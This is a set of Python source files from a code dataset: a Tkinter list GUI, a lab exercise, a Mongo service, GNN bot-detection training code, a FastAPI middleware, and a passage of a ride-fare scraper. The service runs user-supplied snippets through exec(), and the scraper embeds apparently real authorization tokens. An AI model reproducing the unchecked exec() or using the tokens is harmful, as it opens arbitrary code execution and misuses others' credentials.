Purpose: Calculates the average of all the integers in the list\r\n# Inputs: Global Variable\r\n# Output: Screen / Monitor\r\n# =====================================================================\r\n\r\ndef userClickCalcMean():\r\n if not group.intList == []:\r\n mean = group.calcMean()\r\n strOptionTitle.set(value = \"The average of all integers in the list are \" + str(mean))\r\n else:\r\n messagebox.showerror(\"ERROR!\", \"There is currently nothing in the list...\")\r\n\r\n# Date: January 12, 2018\r\n# Author: Brandon Lo\r\n# Purpose: Finds the largest integer in the list\r\n# Inputs: Global Variable\r\n# Output: Screen / Monitor\r\n# =====================================================================\r\n\r\ndef userClickFindLargest():\r\n if not group.intList == []:\r\n largest = group.findLargest()\r\n strOptionTitle.set(value = \"The largest integer in the list is \" + str(largest))\r\n else:\r\n messagebox.showerror(\"ERROR!\", \"There is currently nothing in the list...\")\r\n\r\n# Date: January 12, 2018\r\n# 
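The validation throughout these handlers relies on str.isdigit(), which rejects negative numbers and surrounding whitespace even though int() accepts both. A small helper that validates via exception handling covers those cases (a sketch; this GUI only ever needs non-negative values, so isdigit() is defensible here):

def parse_int(text):
    # int() accepts '-5' and ' 42 ', which isdigit() would reject
    try:
        return int(text)
    except ValueError:
        return None

for raw in ['42', '-5', ' 7 ', 'cat']:
    print(repr(raw), '->', parse_int(raw))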
Author: Brandon Lo\r\n# Purpose: Resets the list\r\n# Inputs: Global Variable\r\n# Output: Screen / Monitor\r\n# =====================================================================\r\n\r\ndef userClickReset():\r\n group.intList = []\r\n group.size = 0\r\n strOptionTitle.set(value = \"The list has been resetted.\")\r\n strList.set(value = group.__str__())\r\n strOptionTitle.set(value = \"CONFIGURE LIST:\")\r\n strMergeTitle.set(value = \"MERGE:\")\r\n\r\n# Date: January 12, 2018\r\n# Author: Brandon Lo\r\n# Purpose: Merges the list with the same one\r\n# Inputs: Global Variable\r\n# Output: Screen / Monitor\r\n# =====================================================================\r\n\r\ndef userClickMergeList():\r\n randomGroup = IntGroup(10)\r\n newGroup = group.merge(randomGroup)\r\n strOptionTitle.set(value = \"Merged the list with another random list.\")\r\n strMergeTitle.set(value = randomGroup.__str__())\r\n strList.set(value = newGroup.__str__())\r\n group.intList = newGroup.intList\r\n\r\n# MAIN (Console)\r\ng = IntGroup(15)\r\nprint(\"Initialized List:\")\r\nprint(g)\r\nprint()\r\n# =========================================================\r\ng.initAsNum(5, 20)\r\nprint(\"Initialize as Number 5, with a size of 20:\")\r\nprint(g)\r\nprint()\r\n# =========================================================\r\ng.initAsSeq(10)\r\nprint(\"Initialize as Sequence, with a size of 10:\")\r\nprint(g)\r\nprint(\"Total:\", g.calcTotal())\r\nprint(\"Mean:\", g.calcMean())\r\nprint(\"Largest:\",g.findLargest())\r\nprint(\"Number of 5's found:\", g.calcFreq(5))\r\nprint()\r\n# =========================================================\r\ng.insertAt(5, 50)\r\ng.insertAt(4, 50)\r\ng.insertAt(3, 50)\r\ng.insertAt(2, 49)\r\ng.insertAt(1, 48)\r\nprint(\"Inserted 3 new integers as 50, one 49, and one 48:\")\r\nprint(g)\r\nprint(\"Number of 50's found:\", g.calcFreq(50))\r\nprint()\r\n# =========================================================\r\ng.removeAll(50)\r\nprint(\"Removed all integer values of 50:\")\r\nprint(g)\r\nprint()\r\n# =========================================================\r\ng.removeAt(8)\r\ng.removeAt(5)\r\nprint(\"Removed position 8 and position 5 from the list (7 and 4):\")\r\nprint(g)\r\nprint(\"Finding value number 49:\", g.findFirst(49))\r\nprint(\"Sorted:\", g.isSorted())\r\ng.intList.sort()\r\nprint()\r\n# =========================================================\r\nprint(\"After Sorting:\")\r\nprint(g)\r\nprint(\"Sorted:\", g.isSorted())\r\nprint()\r\n# =========================================================\r\ng2 = IntGroup(10)\r\nmergedGroup = g.merge(g2)\r\nprint(\"Group A:\")\r\nprint(g)\r\nprint()\r\nprint(\"Group B\")\r\nprint(g2)\r\nprint()\r\nprint(\"Merged Groups:\")\r\nprint(mergedGroup)\r\n\r\n# GUI\r\nmyWindow = Tk()\r\nmyWindow.config(width = 825, height = 275, bg = \"white\")\r\nmyWindow.title(\"INTEGER LIST!\")\r\n\r\nstrList = StringVar()\r\nstrList.set(value = group.__str__())\r\n\r\nstrSize = StringVar()\r\nstrConfigList = StringVar()\r\nstrEntryNum = StringVar()\r\nstrValue = StringVar()\r\nstrPosition = StringVar()\r\nstrFind = StringVar()\r\n\r\nstrOptionTitle = StringVar()\r\nstrOptionTitle.set(value = \"CONFIGURE LIST:\")\r\n\r\nstrMergeTitle = StringVar()\r\nstrMergeTitle.set(value = \"MERGE:\")\r\n\r\nconfig = IntVar()\r\n\r\n# List Title\r\nLabel(myWindow, wraplength = 780, textvariable = strList, width = 99, height = 2, font = (\"Helvetica\", 10, \"bold\")).place(x = 15, y = 12.5)\r\n\r\nButton(myWindow, text = \"RESET\", command = lambda: 
userClickReset(), bg = \"white\", relief = \"solid\", width = 8).place(x = 15, y = 55)\r\n\r\n# Initialize List\r\nLabel(myWindow, text = \"INITIALIZE:\", width = 15, height = 1, bg = \"white\", font = (\"Helvetica\", 12, \"bold\")).place(x = 40, y = 95)\r\nButton(myWindow, text = \"Initialize as Sequence\", command = lambda: userInitSeq(), bg = \"white\", relief = \"solid\", width = 20).place(x = 37.5, y = 130)\r\nButton(myWindow, text = \"Initialize as Number\", command = lambda: userInitNum(), bg = \"white\", relief = \"solid\", width = 15).place(x = 37.5, y = 160)\r\nEntry(myWindow, textvariable = strEntryNum, relief = \"solid\", width = 4).place(x = 160, y = 165)\r\n\r\n# Config List\r\nLabel(myWindow, textvariable = strOptionTitle, width = 56, height = 1, bg = \"white\", font = (\"Helvetica\", 12, \"bold\")).place(x = 225, y = 65)\r\nLabel(myWindow, text = \"VALUE:\", width = 8, height = 1, bg = \"white\").place(x = 245, y = 100)\r\nentryVal = Entry(myWindow, textvariable = strValue, relief = \"solid\", width = 15)\r\nentryVal.place(x = 325, y = 100)\r\nLabel(myWindow, text = \"POSITION:\", width = 8, height = 1, bg = \"white\").place(x = 570, y = 100)\r\nentryPos = Entry(myWindow, textvariable = strPosition, relief = \"solid\", width = 15)\r\nentryPos.place(x = 655, y = 100)\r\nRadiobutton(myWindow, text = \"Add\", command = lambda: userClickAdd(), variable = config, value = 1, bg = \"white\", relief = \"solid\", width = 8).place(x = 225, y = 130)\r\nRadiobutton(myWindow, text = \"Remove\", command = lambda: userClickRmv(), variable = config, value = 2, bg = \"white\", relief = \"solid\", width = 10).place(x = 305, y = 130)\r\nRadiobutton(myWindow, text = \"Remove All\", command = lambda: userClickRmvAll(), variable = config, value = 3, bg = \"white\", relief = \"solid\", width = 12).place(x = 400, y = 130)\r\nRadiobutton(myWindow, text = \"Check Freq\", command = lambda: userClickFreq(), variable = config, value = 4, bg = \"white\", relief = \"solid\", width = 16).place(x = 510, y = 130)\r\nRadiobutton(myWindow, text = \"Find in List\", command = lambda: userClickFind(), variable = config, value = 5, bg = \"white\", relief = \"solid\", width = 18).place(x = 640, y = 130)\r\nButton(myWindow, text = \"Confirm\", command = lambda: userClickConfirm(), bg = \"white\", relief = \"solid\", width = 26).place(x = 225, y = 160)\r\nButton(myWindow, text = \"Sort List\", command = lambda: userClickSort(), bg = \"white\", relief = \"solid\", width = 10).place(x = 415, y = 160)\r\nButton(myWindow, text = \"Check Sort\", command = lambda: userClickCheckSort(), bg = \"white\", relief = \"solid\", width = 10).place(x = 490, y = 160)\r\nButton(myWindow, text = \"Calc Total\", command = lambda: userClickCalcTotal(), bg = \"white\", relief = \"solid\", width = 10).place(x = 565, y = 160)\r\nButton(myWindow, text = \"Calc Mean\", command = lambda: userClickCalcMean(), bg = \"white\", relief = \"solid\", width = 10).place(x = 640, y = 160)\r\nButton(myWindow, text = \"Find Largest\", command = lambda: userClickFindLargest(), bg = \"white\", relief = \"solid\", width = 10).place(x = 715, y = 160)\r\n\r\n# Sizing\r\nLabel(myWindow, text = \"SIZE OF LIST:\", bg = \"white\", font = (\"Helvetica\", 12, \"bold\")).place(x = 55, y = 195)\r\nEntry(myWindow, textvariable = strSize, relief = \"solid\", width = 20).place(x = 50, y = 230)\r\n\r\n# Merge\r\nLabel(myWindow, textvariable = strMergeTitle, width = 56, height = 1, bg = \"white\", font = (\"Helvetica\", 12, \"bold\")).place(x = 225, y = 
200)\r\nButton(myWindow, text = \"Merge the list with another random list [size: 10]\", command = lambda: userClickMergeList(), bg = \"white\", relief = \"solid\", width = 80).place(x = 225, y = 230)\r\n\r\nmainloop()\r\n\r\n\r\n","sub_path":"Python/Lists/Integer Lists.py","file_name":"Integer Lists.py","file_ext":"py","file_size_in_byte":23126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"167351199","text":"# Name:  Luke Harrison \t\t\tDate Assigned: Oct 1, 2015    \n# Name: Mitchell Gressett\n# \n# Course:  CSE 1284 Sec 13 \t\tDate Due:  Oct 1, 2015  \n#\n# File name:  llh281_mdg249_lab5.py\n#\n# Program Description:  Calculate 1st, 2nd, and 3rd of a race\n\nracers = int(input('How many cars were in the race? '))\n\nfirst = 1000\nsecond = 1000\nthird = 1000\nfirst_position = 0\nsecond_position = 0\nthird_position = 0\n\n\nfor each in range(0, racers):\n\ttime = int(input('Time of racer: '))\n\t\n\tif time < third:\n\t\tthird_position = each\n\t\tthird = time\n\t\tif time < second:\n\t\t\tthird = second\n\t\t\tsecond_position = each\n\t\t\tsecond = time\n\t\t\tif time < first:\n\t\t\t\tsecond = first\n\t\t\t\tfirst_position = each\n\t\t\t\tfirst = time\n\n\nprint('First place is #', first_position, 'at ', first)\nprint('Second place is #', second_position, 'at ', second)\nprint('Third place is #', third_position, 'at ', third)","sub_path":"labs/lab_5.py","file_name":"lab_5.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"128695269","text":"\nimport re\nimport json\nimport datetime\n\nfrom clover.common.utils.mongo import Mongo\nfrom clover.common.utils import get_friendly_id\n\n\nclass Service():\n\n def __init__(self):\n self.db = Mongo()\n\n def create(self, data):\n \"\"\"\n :param data:\n :return:\n \"\"\"\n data.setdefault('_id', get_friendly_id())\n data.setdefault('created', datetime.datetime.now())\n collection = data.pop(\"type\", None)\n return self.db.insert(\"environment\", collection, data)\n\n def detele(self, data):\n \"\"\"\n :param data:\n :return:\n \"\"\"\n count = 0\n collection = data.get(\"type\", None)\n for id in data['id_list']:\n result = self.db.delete(\"environment\", collection, {'_id': id})\n count += result\n return count\n\n def update(self, data):\n \"\"\"\n :param data:\n :return:\n \"\"\"\n filter = {'_id': data.pop('_id')}\n collection = data.pop(\"type\", None)\n return self.db.update(\"environment\", collection, filter, data)\n\n def search(self, data):\n \"\"\"\n :param data:\n :return:\n \"\"\"\n collection = data.pop(\"type\", None)\n total, result = self.db.search(\"environment\", collection, data)\n for r in result:\n r['created'] = r['created'].strftime(\"%Y-%m-%d %H:%M:%S\")\n return total, result\n\n def aggregate(self, data):\n \"\"\"\n # cascader: 按照element ui库cascader需要的数据格式返回数据。\n # 团队和项目配置数据不会特别多,因此无需过多关注性能。\n :param data:\n :return:\n \"\"\"\n if 'cascader' in data:\n cascader = {}\n _, results = self.db.search(\"environment\", \"team\", {})\n for result in results:\n if result['team'] not in cascader:\n cascader.setdefault(result['team'], {\n 'label': result['team'],\n 'value': result['team'],\n 'children': [{\n 'label': result['project'],\n 'value': result['project']\n }],\n })\n else:\n labels = [item['label'] for item in cascader[result['team']]['children']]\n if result['project'] not in labels:\n cascader[result['team']]['children'].append({\n 'label': result['project'],\n 
'value': result['project']\n })\n return list(cascader.values())\n elif 'type' in data:\n collection = data.pop(\"type\", None)\n key = data.pop(\"key\", None)\n pipeline = [\n {'$group': {'_id': \"$\" + key}},\n ]\n result = self.db.aggregate(\"environment\", collection, pipeline)\n return result\n else:\n return []\n\n def debug(self, data):\n \"\"\"\n # 自定义关键字中提取函数名和参数,在后面拼接出调用请求,\n # 最后交给exec函数执行,如果提取函数名和参数失败则不处理。\n :param data:\n :return:\n \"\"\"\n mock = json.loads(data.get('mock'))\n snippet = data.get('snippet')\n func = re.findall(r'def\\s+(.+?):', snippet)\n if func:\n snippet += '\\n' + func[0]\n exec(snippet, {'data': mock})\n return mock\n\n def save(self, data):\n \"\"\"\n # 这里需要先提取函数名,然后关键字用函数名进行索引,存到数据库。\n # 如果数据库中函数名已经存在怎么办,是否需要先查询,重复则失败?\n :param data:\n :return:\n \"\"\"\n mock = json.loads(data.get('mock'))\n snippet = data.get('snippet')\n func = re.findall(r'def\\s+(.+?)\\(', snippet)\n name = func[0] if func else \"\"\n print({\n 'name': name,\n 'mock': mock,\n 'snippet': snippet,\n })\n result = self.db.insert(\"environment\", \"snippet\", {\n '_id': get_friendly_id(),\n 'name': name,\n 'mock': mock,\n 'snippet': snippet,\n })\n print(result)\n return result\n\n\nif __name__ == '__main__':\n service = Service()\n print(service.aggregate({'cascader': None}))\n","sub_path":"clover/environment/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":4458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"408474673","text":"import os\nimport numpy as np\nimport random\nimport torch\nfrom torch_geometric.nn import GCNConv,global_mean_pool,GATConv\nfrom torch_geometric.utils.convert import to_scipy_sparse_matrix\nimport torch.nn.functional as F\nimport networkx as nx\nfrom sklearn.preprocessing import normalize\nimport pickle\nimport math\nfrom collections import defaultdict\nfrom .SocialData import SocialBotDataset\nfrom sklearn import preprocessing\nfrom .utils import remove_self_loops\nfrom itertools import permutations\nrandom.seed(12345)\ntorch.manual_seed(12345)\n\nclass Net(torch.nn.Module):\n\tdef __init__(self, max_layer, node_dim, hid_dim, out_dim):\n\t\tsuper(Net, self).__init__()\n\t\ttorch.manual_seed(12345)\n\t\tself.hidden = []\n\t\tself.lin_res = torch.nn.Linear(node_dim, hid_dim)\n\t\tself.hidden.append(GCNConv(node_dim, hid_dim))\n\t\tfor i in range(max_layer-1):\n\t\t\tself.hidden.append(GCNConv(hid_dim, hid_dim))\n\t\tself.node_dim, self.hid_dim = node_dim, hid_dim\n\t\tself.fc1 = torch.nn.Linear(hid_dim, hid_dim)\n\t\tself.fc2 = torch.nn.Linear(hid_dim, hid_dim)\n\t\tself.pool = torch.mean\n\t\tself.attention = GATConv(hid_dim,hid_dim,heads=1,add_self_loops=True)\n\t\tself.lin = torch.nn.Linear(hid_dim, out_dim)\n\n\tdef forward(self, action, datas,all_features,indexes,k_hop_sg,device):\n\t\ttarget_feats = torch.FloatTensor(len(indexes), self.hid_dim).to(device)\n\t\tif len(indexes)==1:\n\t\t\tsub_graph_edge_index = [(0,0)]\n\t\telse:\n\t\t\tsub_graph_edge_index = list(permutations(range(len(indexes)), 2))\n\t\tsub_graph_edge_index = torch.tensor(sub_graph_edge_index,dtype=torch.long).t()\n\t\tfor i,(index,act2) in enumerate(datas):\n\t\t\tfeature_index, edge_index = k_hop_sg[act2][index.item()]\n\t\t\tfeatures = all_features[feature_index]\n\t\t\tedge_index = edge_index.to(device)\n\t\t\tx = features.to(device)\n\t\t\tx1 = F.dropout(F.relu(self.lin_res(x)),p=0.5, training=self.training)\n\t\t\tfor k in range(action+1):\n\t\t\t\tx = 
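The aggregate branch above folds flat team/project rows into the nested label/value/children shape that the element-ui cascader expects, deduplicating both levels as it goes. A compact stand-alone version of the same grouping (inline sample rows instead of a Mongo query):

rows = [
    {'team': 'qa', 'project': 'clover'},
    {'team': 'qa', 'project': 'clover'},   # duplicate project is skipped
    {'team': 'qa', 'project': 'mock'},
    {'team': 'dev', 'project': 'gateway'},
]

cascader = {}
for row in rows:
    node = cascader.setdefault(row['team'],
                               {'label': row['team'], 'value': row['team'], 'children': []})
    if row['project'] not in (child['label'] for child in node['children']):
        node['children'].append({'label': row['project'], 'value': row['project']})

print(list(cascader.values()))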
F.relu(self.hidden[k].to(device)(x,edge_index),inplace=True)\n\t\t\t\tx = F.dropout(x, training=self.training)\n\t\t\tx = F.dropout(F.relu(self.fc1(torch.add(x,x1))), training=self.training)\n\t\t\ttarget_feats[i] = self.pool(x, dim=0,keepdim=False) # [batch_size, hidden_channels]\n\n\t\ttarget_feats = self.attention(target_feats.to(device),sub_graph_edge_index.to(device))\n\t\ttarget_feats = self.lin(target_feats)\n\t\treturn F.log_softmax(target_feats, dim=1)\n\n\n\nclass gcn_env(object):\n\tdef __init__(self,\n\t\t\t\t dataset, folds,\n\t\t\t\t max_layer,\n\t\t\t\t max_width,\n\t\t\t\t hid_dim, out_dim,\n\t\t\t\t lr, weight_decay,\n\t\t\t\t device,\n\t\t\t\t policy=\"\",\n\t\t\t\t K=0):\n\t\tself.device = device\n\t\tself.max_layer = max_layer\n\t\tself.width_num = max_width\n\t\tself.load_social_dataset(dataset,K)\n\t\tself.train_num, self.val_num, self.test_num\\\n\t\t\t= len(self.train_indexes), len(self.val_indexes), len(self.test_indexes)\n\n\t\tself.batch_size = min(self.train_num,self.val_num,self.test_num)\n\t\tself.sg_num = self.dataset.data.y.shape[0]\n\t\tself.ini_k_hop_target_user(max_width)\n\t\tself.model = Net(max_layer, self.dataset.data.x.shape[-1], hid_dim, out_dim).to(device)\n\t\tself.optimizer = torch.optim.Adam(self.model.parameters(), lr, weight_decay=weight_decay)\n\n\n\t\tself.batch_size_qdn = math.ceil(self.train_num)\n\t\tself.policy = policy\n\t\tself.state_shape = self.dataset.data.x.shape\n\t\tself.baseline_experience = 100\n\t\tself.buffers = defaultdict(list)\n\t\tself.past_performance = [0]\n\t\tself.criterion = torch.nn.CrossEntropyLoss()\n\n\tdef ini_k_hop_target_user(self,max_hop):\n\t\tsp_adj = to_scipy_sparse_matrix(self.data.edge_index).tocsr()\n\t\tdd = sp_adj[:self.sg_num,:]\n\t\tself.target_user_k_adjs = []\n\t\ttarget_adj = dd[:, :self.sg_num]\n\t\ttarget_adj = target_adj.toarray()\n\t\ttarget_adj = normalize(target_adj, norm='l1', axis=1)\n\t\tself.target_user_k_adjs.append(target_adj)\n\t\tfor hop in range(max_hop-1):\n\t\t\tdd = dd * sp_adj\n\t\t\ttarget_adj = dd[:,:self.sg_num]\n\t\t\ttarget_adj = target_adj.toarray()\n\t\t\ttarget_adj = normalize(target_adj, norm='l1', axis=1)\n\t\t\tself.target_user_k_adjs.append(target_adj)\n\n\tdef load_social_dataset(self,dataset,K):\n\t\tprint(\"loading dataset\")\n\t\tmin_max_scaler = preprocessing.MinMaxScaler()\n\t\tself.dataset = SocialBotDataset(root=\"./data\", pre_transform=min_max_scaler.fit_transform,K=K)\n\t\tself.data = self.dataset[0]\n\t\tself.train_indexes, self.val_indexes, self.test_indexes,self.G = self.dataset.train_index,self.dataset.val_index,self.dataset.test_index,self.dataset.G\n\t\tself.k_hop_sg = [[] for i in range(self.width_num)]\n\t\tself.init_states = []\n\t\tself.all_target_index = list(range(len(self.dataset.data.y)))\n\t\tfilepath = os.path.join(\"data\",\"raw\",self.dataset.cur_dataset+str(self.width_num)+\"sub_g_features.pickle\")\n\t\tif os.path.exists(filepath):\n\t\t\twith open(filepath, 'rb') as f:\n\t\t\t\tself.init_states, self.k_hop_sg = pickle.load(f)\n\t\telse:\n\t\t\tfor item in self.all_target_index:\n\t\t\t\tprint(item)\n\t\t\t\tsub_graph = nx.ego_graph(self.G,item,radius=1,center=True,undirected=False)\n\t\t\t\tedges, feature_index, features = self.map_subgraph_into_new_nodes(sub_graph, include_features=True)\n\t\t\t\tinit_state = torch.mean(features, dim=0)\n\t\t\t\tself.init_states.append(init_state.numpy())\n\t\t\t\tself.k_hop_sg[0].append((feature_index, edges))\n\t\t\t\tfor i in range(1,self.width_num):\n\t\t\t\t\t\tsub_graph = nx.ego_graph(self.G, 
item, radius=i+1, center=True, undirected=False)\n\t\t\t\t\t\tedges, feature_index, features = self.map_subgraph_into_new_nodes(sub_graph, include_features=False)\n\t\t\t\t\t\tself.k_hop_sg[i].append((feature_index,edges))\n\t\t\twith open(filepath,'wb') as f:\n\t\t\t\tpickle.dump([self.init_states,self.k_hop_sg], f)\n\t\tself.init_states = np.array(self.init_states)\n\t\tprint(\"done!\")\n\n\tdef map_subgraph_into_new_nodes(self,G,include_features=False):\n\t\tnodes = G.nodes\n\t\tnodes_dict = { index:i for i, index in enumerate(nodes)}\n\t\tfeature_index = torch.tensor(list(nodes_dict.keys()),dtype=torch.long)\n\t\tedges = [(nodes_dict[edge[0]], nodes_dict[edge[1]]) for edge in G.edges]\n\t\tedges = np.array(edges).T\n\t\tedges = remove_self_loops(edges)\n\t\tedges = torch.tensor(edges, dtype=torch.long)\n\t\tif include_features:\n\t\t\tfeatures = self.data.x[feature_index]\n\t\t\treturn edges,feature_index,features\n\t\telse:\n\t\t\treturn edges,feature_index,None\n\n\n\tdef reset(self,train_gnn=False):\n\t\tstates = self.init_states[self.train_indexes]\n\t\tself.optimizer.zero_grad()\n\t\treturn states\n\n\tdef stochastic_k_hop(self, actions, index):\n\t\tnext_batch = []\n\t\ttarget_users = np.array([i for i in range(self.sg_num)])\n\t\tfor act, idx in zip(actions, index):\n\t\t\tprob = self.target_user_k_adjs[act][idx]\n\t\t\tprob = prob if np.sum(prob) > 0. else np.full(len(prob), 1. / len(prob))\n\t\t\tnext_target = np.random.choice(target_users, p=prob)\n\t\t\tnext_batch.append(next_target)\n\t\treturn next_batch\n\n\tdef step(self, actions):\n\t\taction1s = actions[0]\n\t\taction2s = actions[1]\n\t\tself.model.train()\n\t\tself.optimizer.zero_grad()\n\t\tindex = self.train_indexes\n\t\tdone = False\n\n\t\tfor act1,act2, idx in zip(action1s,action2s,index):\n\t\t\tself.buffers[act1].append((idx,act2))\n\t\t\tif len(self.buffers[act1]) >= self.batch_size_qdn:\n\t\t\t\tself.train(act1, self.buffers[act1])\n\t\t\t\tself.buffers[act1] = []\n\t\t\t\tdone = True\n\n\t\t# next states\n\t\tnext_batch_index = self.stochastic_k_hop(action2s, index)\n\t\tnext_states = self.init_states[next_batch_index]\n\t\tval_acc_dict = self.eval()\n\t\tval_acc = [val_acc_dict[a] for a in action1s]\n\t\tbaseline = np.mean(np.array(self.past_performance[-self.baseline_experience:]))\n\t\tself.past_performance.extend(val_acc)\n\t\treward = [100 * (each - baseline) for each in val_acc]\n\t\tr = np.mean(np.array(reward))\n\t\tval_acc = np.mean(val_acc)\n\t\treturn next_states, reward, [done] * len(next_states), (val_acc, r)\n\n\tdef train(self, act1, datas):\n\t\tself.model.train()\n\t\tindexes = []\n\t\tfor (index,act2) in datas:\n\t\t\tindexes.append(index)\n\t\tlength = len(indexes)\n\t\tnum_batches = math.ceil(length / self.batch_size)\n\t\tfor batch in range(num_batches):\n\t\t\ti_start = batch * self.batch_size\n\t\t\ti_end = min((batch + 1) * self.batch_size, length)\n\t\t\tpreds = self.model(act1, datas[i_start:i_end], self.data.x, indexes[i_start:i_end],\n\t\t\t\t\t\t\t\tself.k_hop_sg, self.device)\n\t\t\tlabels = torch.LongTensor(self.dataset.data.y[torch.LongTensor(indexes[i_start:i_end])]).to(self.device)\n\t\t\tself.criterion(preds, labels).backward()\n\t\t\tself.optimizer.step()\n\n\tdef eval(self):\n\t\tself.model.eval()\n\t\tbatch_dict = {}\n\t\tval_indexes = self.val_indexes\n\t\tval_states = self.init_states[self.val_indexes]\n\t\tval_act1s,val_act2s = self.policy.eval_step(val_states)\n\t\ts_a = zip(val_indexes, val_act1s,val_act2s)\n\t\tfor i, a1, a2 in s_a:\n\t\t\tif a1 not in 
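map_subgraph_into_new_nodes above re-indexes an ego subgraph's nodes to 0..n-1 so its edge list can index into a local feature tensor. The same relabeling with plain networkx (no torch needed for the sketch):

import networkx as nx

G = nx.karate_club_graph()
sub = nx.ego_graph(G, 0, radius=1)  # 1-hop neighbourhood around node 0

mapping = {node: i for i, node in enumerate(sub.nodes)}  # original id -> local id
edges = [(mapping[u], mapping[v]) for u, v in sub.edges]

print(len(sub), 'nodes,', len(edges), 'locally indexed edges')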
batch_dict.keys():\n\t\t\t\tbatch_dict[a1] = []\n\t\t\tbatch_dict[a1].append((i,a2))\n\n\t\taccs = {a: 0.0 for a in range(self.max_layer)}\n\t\tfor act1 in batch_dict.keys():\n\t\t\tindexes = []\n\t\t\tfor (index,act2) in batch_dict[act1]:\n\t\t\t\tindexes.append(index)\n\t\t\tlength = len(indexes)\n\t\t\tcorrect = 0\n\t\t\tnum_batches = math.ceil(length / self.batch_size)\n\t\t\tfor batch in range(num_batches):\n\t\t\t\ti_start = batch * self.batch_size\n\t\t\t\ti_end = min((batch + 1) * self.batch_size, length)\n\t\t\t\tlogits = self.model(act1, batch_dict[act1][i_start:i_end], self.data.x, indexes[i_start:i_end],\n\t\t\t\t\t\t\t\t\tself.k_hop_sg, self.device)\n\t\t\t\tpreds = logits.argmax(dim=1)\n\t\t\t\tbatch_label = torch.LongTensor(self.dataset.data.y[torch.LongTensor(indexes[i_start:i_end])]).to(self.device)\n\t\t\t\tcorrect += int((preds == batch_label).sum()) # Check against ground-truth labels.\n\t\t\tacc = correct / length\n\t\t\taccs[act1] = acc\n\t\treturn accs\n\n\n\tdef test(self):\n\t\tself.model.eval()\n\t\tbatch_dict = {}\n\t\ttest_indexes = self.test_indexes\n\n\t\ttest_states = self.init_states[self.test_indexes]\n\t\ttest_act1s, test_act2s = self.policy.eval_step(test_states)\n\n\t\ts_a = zip(test_indexes, test_act1s,test_act2s)\n\t\tfor i, a1, a2 in s_a:\n\t\t\tif a1 not in batch_dict.keys():\n\t\t\t\tbatch_dict[a1] = []\n\t\t\tbatch_dict[a1].append((i,a2))\n\t\ttest_length = len(self.test_indexes)\n\t\tcorrect = 0\n\t\tfor act1 in batch_dict.keys():\n\t\t\tindexes = []\n\t\t\tfor (index,act2) in batch_dict[act1]:\n\t\t\t\tindexes.append(index)\n\t\t\tlength = len(indexes)\n\t\t\tnum_batches = math.ceil(length / self.batch_size)\n\n\t\t\tfor batch in range(num_batches):\n\t\t\t\ti_start = batch * self.batch_size\n\t\t\t\ti_end = min((batch + 1) * self.batch_size, length)\n\t\t\t\tlogits = self.model(act1, batch_dict[act1][i_start:i_end], self.data.x, indexes[i_start:i_end], self.k_hop_sg, self.device)\n\t\t\t\tpreds = logits.argmax(dim=1)\n\t\t\t\tbatch_label = torch.LongTensor(self.dataset.data.y[torch.LongTensor(indexes[i_start:i_end])]).to(self.device)\n\t\t\t\tcorrect += int((preds == batch_label).sum())\n\t\tacc = correct / test_length\n\t\treturn acc\n\n\n\n\n\n","sub_path":"RoGAS/model/gcn.py","file_name":"gcn.py","file_ext":"py","file_size_in_byte":10399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"155229149","text":"import time\n\nfrom fastapi import FastAPI, Request\nfrom starlette.middleware.base import BaseHTTPMiddleware\n\n\nclass PerformanceMonitoringMiddleware(BaseHTTPMiddleware):\n async def dispatch(self, request: Request, call_next):\n start_time = time.time()\n response = await call_next(request)\n process_time = time.time() - start_time\n response.headers[\"X-Process-Time-MS\"] = str(\n round(process_time * 1000, 2)\n )\n return response\n","sub_path":"app/utils/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"50794726","text":"import requests\nimport json\nimport datetime\n\ndef get_price(diction):\n o_latitude = diction['o_latitude']\n o_longitude = diction['o_longitude']\n d_latitude = diction['d_latitude']\n d_longitude = diction['d_longitude']\n# TAPSI\n url = 'https://tap33.me/api/v2.1/ride/preview'\n header = {'content-type': 'application/json', 'x-authorization' : 
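The FastAPI middleware above brackets each request with two time.time() calls and reports the difference in an X-Process-Time-MS response header. The same measurement works anywhere as a decorator; time.perf_counter() is the usual clock for short intervals because it is monotonic and higher resolution (a generic sketch, not tied to Starlette):

import time
from functools import wraps

def timed(func):
    @wraps(func)
    def wrapper(*args, **kwargs):
        start = time.perf_counter()
        result = func(*args, **kwargs)
        elapsed_ms = round((time.perf_counter() - start) * 1000, 2)
        print('%s took %s ms' % (func.__name__, elapsed_ms))
        return result
    return wrapper

@timed
def handler():
    time.sleep(0.05)

handler()  # handler took roughly 50 ms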
'eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjp7ImlkIjoyNTY1OTMsInJvbGUiOiJQQVNTRU5HRVIiLCJjaXR5IjoiVEVIUkFOIiwiZGV2aWNlVHlwZSI6IldFQkFQUCJ9LCJpYXQiOjE1Nzk2MTU2MjMsImF1ZCI6ImRvcm9zaGtlOmFwcCIsImlzcyI6ImRvcm9zaGtlOnNlcnZlciIsInN1YiI6ImRvcm9zaGtlOnRva2VuIn0.Pjqcy14qLRbNE6IDbkCcxwBKXlo094SmakUmOCq04JFlq1Tvli7fyT1ZVSrTK3WgcqPI-09MzhruXU05YHneBg'}\n datas = {\"origin\":{\"latitude\":o_latitude,\"longitude\":o_longitude},\"destinations\":[{\"latitude\":d_latitude,\"longitude\":d_longitude}],\"hasReturn\":'false',\"initiatedVia\":\"WEB\"}\n tap30_sr = ServiceRequest(url, header, datas)\n price_tap30 = tap30_sr.tap30_price_checker()\n# SNAPP\n url = 'https://web-api.snapp.ir/api/v1/ride/price'\n header = {'authorization' : '24333bb925f41fc32ef10d99a5c5d3261579600718'}\n datas = {\"origin_lat\":o_latitude,\"origin_lng\":o_longitude,\"round_trip\":0,\"destination_lat\":d_latitude,\"destination_lng\":d_longitude}\n snapp_sr = ServiceRequest(url, header, datas)\n price_snapp = int(snapp_sr.snapp_price_checker()/10)\n\n print(\"2\")\n prices = {\"TAPSI\":price_tap30,\"SNAPP\":price_snapp}\n return prices\n\n\nclass ServiceRequest():\n def __init__(self, url, header, datas):\n self.url = url\n self.header = header\n self.datas = 